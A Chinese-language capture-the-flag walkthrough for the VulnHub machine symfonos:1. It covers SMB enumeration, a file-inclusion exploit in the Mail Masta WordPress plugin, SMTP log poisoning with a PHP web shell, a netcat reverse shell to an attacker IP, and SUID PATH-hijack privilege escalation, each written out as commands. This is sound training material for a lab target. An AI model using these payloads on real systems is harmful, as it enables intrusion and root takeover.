靶机下载: symfonos: 1 ~ VulnHub
提升条件:存在SUID的应用中能可逆向出执行命令,加用户权限
1、信息收集:
nmap扫描获取靶机ip
发现开放了445端口(SMB协议的默认端口)
与靶机通过smb建立连接
smbclient -L 192.168.0.8
成功连接
这里有4个用户,只有anonymous不需要密码
2、权限获取:
smbclient //192.168.0.8/anonymous
成功访问
获取目录下的文件
ls
get attention.txt
查看文件
通过告诉我们的密码访问其他用户
smbclient //192.168.0.8/helios -U helios //密码qwerty
同样获取到里面的文件
获取到的todo.txt告诉我们有一个网站 /h3l105
访问发现是一个wordpress网站
3、漏洞利用
使用wpscan对进行漏洞检测
wpscan --url http://192.168.0.8/h3l105/ --plugins-detection aggressive
扫描获取到其中一个漏洞
searchsploit获取漏洞利用
searchsploit mail masta 1.0
寻找利用文件
find / -name 41438.txt
根据poc进行利用(这是一个文件包含漏洞)
http://192.168.0.8/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
发送木马邮件
因为前面端口扫描发现开放了25端口,这是一个邮件端口
我们发送一个包含木马的邮件
telnet 192.168.0.8 25
MAIL FROM: MALABIS
RCPT TO: helios
data
<?php system($_GET['shell']); ?>
.
QUIT
利用poc进行邮件日志包含
访问默认邮件日志路径 view-source:http://192.168.0.8/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios
反弹shell
反弹shell生成器
http://192.168.0.8/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&shell=nc -c sh 192.168.0.4 6666
4、权限提升(配合SUID):
python -c 'import pty;pty.spawn("/bin/bash")'
用python启一个终端
find / -perm -u=s -type f 2>/dev/null
查看有SUID权限的文件
strings /opt/statuscheck
这里我们选择 /opt/statuscheck
之所以选择/opt/statuscheck而不选择如 /usr/bin/passwd这些是因为/usr/bin/passwd是系统写死的,我们无法更改。而/opt/statuscheck是我们可以更改的
获取文件字符串信息寻找利用点
发现该文件里面会执行curl
环境变量劫持提权
这里劫持的是curl变量
未修改变量之前,执行crul默认的目录是这个下面的curl
劫持变量后,默认的路径就是/tmp目录下的curl,但这个crul已经被我们修改了
cd /tmp
echo "/bin/sh" > curl //在/tmp目录下新建一个Curl文件并写入要执行的东西
chmod 777 curl //给权限
export PATH=/tmp:$PATH //将/temp目录下的curl加入系统变量
echo $PATH //查看当前环境变量
/opt/statuscheck //执行statuscheck相当于用利用SUID执行sh 提权获取root权限
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
